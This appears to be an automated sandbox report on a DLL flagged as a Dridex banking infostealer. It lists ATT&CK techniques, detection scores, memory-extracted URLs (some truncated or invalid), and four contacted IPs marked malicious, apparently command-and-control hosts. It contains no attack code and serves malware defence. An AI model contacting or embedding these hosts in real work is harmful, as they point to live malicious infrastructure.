                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection112Process Injection112OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRundll321LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery23Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Variant.Razy.980776.9478.dll6%VirustotalBrowse
                      SecuriteInfo.com.Variant.Razy.980776.9478.dll38%ReversingLabsWin32.Infostealer.Dridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://192.46.210.220/563209-4053062332-10020%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dll0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/Rf0%Avira URL Cloudsafe
                      https://192.46.210.220/Certification0%URL Reputationsafe
                      https://45.77.0.96:6891/.0.96:6891/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/W0%Avira URL Cloudsafe
                      https://143.244.140.214:808/lGq0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/q0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/r0%Avira URL Cloudsafe
                      https://143.244.140.214:808/oft0%URL Reputationsafe
                      https://45.77.0.96:6891/ri0%Avira URL Cloudsafe
                      https://143.244.140.214:808/P0%Avira URL Cloudsafe
                      https://192.46.210.220/nQ0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/4H0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/fW0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/14M0%Avira URL Cloudsafe
                      https://143.244.140.214:808/ll0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/ES0%Avira URL Cloudsafe
                      https://192.46.210.220/liuS0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/899f5f57b9a0%Avira URL Cloudsafe
                      https://192.46.210.220/30%Avira URL Cloudsafe
                      https://45.77.0.96:6891/rY0%Avira URL Cloudsafe
                      https://192.46.210.220/GlobalSign0%URL Reputationsafe
                      https://143.244.140.214:808/la0%Avira URL Cloudsafe
                      https://192.46.210.220/00%Avira URL Cloudsafe
                      https://45.77.0.96:6891/140%Avira URL Cloudsafe
                      https://185.56.219.47/-0%Avira URL Cloudsafe
                      https://192.46.210.220/-0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/M0%Avira URL Cloudsafe
                      https://143.244.140.214/0%URL Reputationsafe
                      https://143.244.140.214:808/My0%URL Reputationsafe
                      https://192.46.210.220/rs0%Avira URL Cloudsafe
                      https://185.56.219.47/0%URL Reputationsafe
                      https://192.46.210.220/50%Avira URL Cloudsafe
                      https://143.244.140.214:808/hybq0%Avira URL Cloudsafe
                      https://192.46.210.220/Im0%Avira URL Cloudsafe
                      https://192.46.210.220/B0%Avira URL Cloudsafe
                      https://192.46.210.220/(r0%Avira URL Cloudsafe
                      https://192.46.210.220/Is0%Avira URL Cloudsafe
                      https://192.46.210.220/K0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/08/0%Avira URL Cloudsafe
                      https://185.56.219.47/T0%Avira URL Cloudsafe
                      https://192.46.210.220/S0%Avira URL Cloudsafe
                      https://45.7-0%Avira URL Cloudsafe
                      https://185.56.219.47/rm0%Avira URL Cloudsafe
                      https://192.46.210.220/T0%Avira URL Cloudsafe
                      https://143.244.140.214:808/hyQq0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/j0%Avira URL Cloudsafe
                      https://143.244.140.214:808/0%URL Reputationsafe
                      https://45.77.0.96:6891/0%URL Reputationsafe
                      https://143.244.140.214:808/.140.214:808/la0%Avira URL Cloudsafe
                      https://192.46.210.220/en-US0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/y$70%Avira URL Cloudsafe
                      https://192.46.210.220/Aq0%Avira URL Cloudsafe
                      https://192.46.210.220/BQ0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/F0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/D0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/90%Avira URL Cloudsafe
                      https://143.244.140.214:808/hy0%URL Reputationsafe
                      https://192.46.210.220/y0%Avira URL Cloudsafe
                      https://143.244.140.214:808/Gq0%Avira URL Cloudsafe
                      https://143.244.140.214/Ev0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/Vi0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/llo0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/0%URL Reputationsafe
                      https://192.46.210.220/563209-4053062332-1002y0%Avira URL Cloudsafe
                      https://45.77.0.96/0%URL Reputationsafe
                      https://192.46.210.220/_s0%Avira URL Cloudsafe
                      https://143.244.140.214:808/llbq0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/.0.96:6891/liuS0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/l0%Avira URL Cloudsafe
                      https://192.46.210.220/563209-4053062332-1002L0%Avira URL Cloudsafe
                      https://45.77.0.96/-0%Avira URL Cloudsafe
                      https://192.46.210.220/graphy0%Avira URL Cloudsafe
                      https://192.46.210.220/jQ0%Avira URL Cloudsafe
                      https://192.46.210.220/0%URL Reputationsafe
                      https://182.46.210.220/0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/der0%Avira URL Cloudsafe
                      https://192.46.210.220/zQ0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/ll0%Avira URL Cloudsafe
                      https://143.244.140.214:808/z0%Avira URL Cloudsafe
                      https://183.244.140.214:808/0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/08/l0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/=-0%Avira URL Cloudsafe
                      https://143.244.140.214:808/l0%URL Reputationsafe
                      https://45.77.0.96:6891/graphy0%URL Reputationsafe
                      https://185.56.219.47:8116/48020%Avira URL Cloudsafe
                      https://452.46.210.220/0%Avira URL Cloudsafe
                      https://192.46.210.220/Vs0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/8140%Avira URL Cloudsafe
                      https://192.46.210.220/6Q0%Avira URL Cloudsafe
                      https://192.46.210.220/P60%Avira URL Cloudsafe
                      https://192.46.210.220/.Q0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/Q%0%Avira URL Cloudsafe
                      https://192.46.210.220/FQ0%Avira URL Cloudsafe
                      https://192.46.210.220/ography0%URL Reputationsafe
                      https://185.56.219.47:8116/Ps%0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/Microsoft0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://192.46.210.220/true
                      • URL Reputation: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://192.46.210.220/563209-4053062332-1002rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/aenh.dllloaddll32.exe, 00000002.00000003.640878974.0000000000F55000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/Rfrundll32.exe, 00000007.00000002.815937821.0000000005413000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Certificationloaddll32.exe, 00000002.00000002.814100062.0000000000F98000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45.77.0.96:6891/.0.96:6891/rundll32.exe, 00000007.00000003.524364338.0000000005416000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/Wloaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/lGqrundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/qloaddll32.exe, 00000002.00000003.649139573.0000000000F55000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.815358842.00000000033D1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/rloaddll32.exe, 00000002.00000003.484765322.0000000000F56000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.715289859.0000000000F54000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.433750522.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/oftloaddll32.exe, 00000002.00000003.590990072.0000000000F5F000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.789346545.0000000003361000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45.77.0.96:6891/rirundll32.exe, 00000007.00000003.565824893.0000000005416000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/Prundll32.exe, 00000007.00000002.815270694.0000000003361000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/nQrundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/4Hrundll32.exe, 00000007.00000003.693220636.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/fWrundll32.exe, 00000007.00000003.590697653.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/14Mrundll32.exe, 00000007.00000003.693220636.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/llrundll32.exe, 00000007.00000003.524322961.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/ESrundll32.exe, 00000007.00000003.454521385.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/liuSrundll32.exe, 00000007.00000003.693267353.0000000005416000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/899f5f57b9aloaddll32.exe, 00000002.00000003.640878974.0000000000F55000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/3loaddll32.exe, 00000002.00000003.451141108.0000000000F57000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/rYrundll32.exe, 00000007.00000002.815358842.00000000033D1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/GlobalSignrundll32.exe, 00000007.00000003.615902947.0000000003361000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://143.244.140.214:808/larundll32.exe, 00000007.00000003.624273197.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/0rundll32.exe, 00000007.00000003.734581021.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/14loaddll32.exe, 00000002.00000003.434212982.0000000000F5A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47/-rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/-rundll32.exe, 00000007.00000003.454521385.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/Mrundll32.exe, 00000007.00000003.632573369.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214/loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://143.244.140.214:808/Myloaddll32.exe, 00000002.00000003.474152776.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.524322961.0000000003361000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/rsrundll32.exe, 00000007.00000003.615902947.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47/rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/5loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/hybqrundll32.exe, 00000007.00000003.615902947.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Imrundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Bloaddll32.exe, 00000002.00000003.451141108.0000000000F57000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/(rrundll32.exe, 00000007.00000003.734581021.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Isrundll32.exe, 00000007.00000003.615902947.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Kloaddll32.exe, 00000002.00000003.507704635.0000000000F59000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.815150304.00000000032FA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/08/loaddll32.exe, 00000002.00000003.434212982.0000000000F5A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47/Tloaddll32.exe, 00000002.00000003.438385750.0000000000F5A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Sloaddll32.exe, 00000002.00000002.814100062.0000000000F98000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.7-loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://185.56.219.47/rmrundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Tloaddll32.exe, 00000002.00000003.507704635.0000000000F59000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/hyQqrundll32.exe, 00000007.00000003.590697653.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/jrundll32.exe, 00000007.00000003.693220636.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45.77.0.96:6891/loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.615853148.0000000000F58000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.451150859.0000000000F60000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.746888787.0000000005416000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://143.244.140.214:808/.140.214:808/larundll32.exe, 00000007.00000003.685102476.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/en-USrundll32.exe, 00000007.00000003.734581021.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/y$7loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Aqloaddll32.exe, 00000002.00000002.814100062.0000000000F98000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/BQrundll32.exe, 00000007.00000003.438132004.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/Frundll32.exe, 00000007.00000003.734581021.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/Drundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/9rundll32.exe, 00000007.00000003.438113449.00000000033D1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/hyloaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.496322195.0000000003361000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.421191267.000000000336A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/yloaddll32.exe, 00000002.00000003.591088945.0000000000F58000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/Gqrundll32.exe, 00000007.00000002.815270694.0000000003361000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214/Evrundll32.exe, 00000007.00000003.421191267.000000000336A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/Virundll32.exe, 00000007.00000003.524364338.0000000005416000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/llorundll32.exe, 00000007.00000003.746859571.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/563209-4053062332-1002yrundll32.exe, 00000007.00000003.615902947.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96/rundll32.exe, 00000007.00000003.471262416.00000000033A1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/_srundll32.exe, 00000007.00000003.438132004.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/llbqrundll32.exe, 00000007.00000003.565788704.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/.0.96:6891/liuSrundll32.exe, 00000007.00000003.565824893.0000000005416000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/lrundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/563209-4053062332-1002Lrundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96/-rundll32.exe, 00000007.00000003.433791949.000000000339E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/graphyrundll32.exe, 00000007.00000003.496358216.0000000005416000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.565824893.0000000005416000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/jQrundll32.exe, 00000007.00000003.565788704.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://182.46.210.220/loaddll32.exe, 00000002.00000002.813943136.0000000000F4C000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/derloaddll32.exe, 00000002.00000003.434212982.0000000000F5A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/zQrundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/llloaddll32.exe, 00000002.00000003.538347137.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/zloaddll32.exe, 00000002.00000003.507704635.0000000000F59000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://183.244.140.214:808/rundll32.exe, 00000007.00000002.815270694.0000000003361000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/08/lloaddll32.exe, 00000002.00000003.451150859.0000000000F60000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/=-loaddll32.exe, 00000002.00000003.599359620.0000000000FCA000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/lloaddll32.exe, 00000002.00000003.789280519.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45.77.0.96:6891/graphyrundll32.exe, 00000007.00000003.487977022.0000000005416000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.815937821.0000000005413000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.516053522.0000000005416000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://185.56.219.47:8116/4802loaddll32.exe, 00000002.00000003.780894009.0000000000F4C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://452.46.210.220/loaddll32.exe, 00000002.00000003.591079359.0000000000F4C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://192.46.210.220/Vsrundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/814rundll32.exe, 00000007.00000003.565788704.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/6Qrundll32.exe, 00000007.00000003.479578980.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/P6loaddll32.exe, 00000002.00000002.814100062.0000000000F98000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/.Qrundll32.exe, 00000007.00000003.496322195.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/Q%loaddll32.exe, 00000002.00000003.451150859.0000000000F60000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/FQrundll32.exe, 00000007.00000003.624273197.0000000003361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/ographyrundll32.exe, 00000007.00000003.516053522.0000000005416000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.693267353.0000000005416000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://185.56.219.47:8116/Ps%loaddll32.exe, 00000002.00000002.814006156.0000000000F58000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/Microsoftrundll32.exe, 00000007.00000002.815937821.0000000005413000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.524364338.0000000005416000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.734607197.0000000005416000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.590739605.0000000005416000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      45.77.0.96
                      unknownUnited States
                      20473AS-CHOOPAUStrue
                      185.56.219.47
                      unknownItaly
                      202675KELIWEBITtrue
                      192.46.210.220
                      unknownUnited States
                      5501FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGetrue
                      143.244.140.214
                      unknownUnited States
                      174COGENT-174UStrue

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:510687
                      Start date:28.10.2021
                      Start time:04:51:12
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 10m 28s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:SecuriteInfo.com.Variant.Razy.980776.9478.23455 (renamed file extension from 23455 to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal84.bank.troj.evad.winDLL@11/1@0/4
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 13.9% (good quality ratio 13.9%)
                      • Quality average: 79.1%
                      • Quality standard deviation: 16.1%
                      HCA Information:
                      • Successful, ratio: 64%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 20.50.102.62, 173.222.108.210, 173.222.108.226, 23.203.67.116, 23.203.78.112, 20.82.209.104, 80.67.82.235, 80.67.82.211, 20.54.110.249, 52.251.79.25, 40.112.88.60
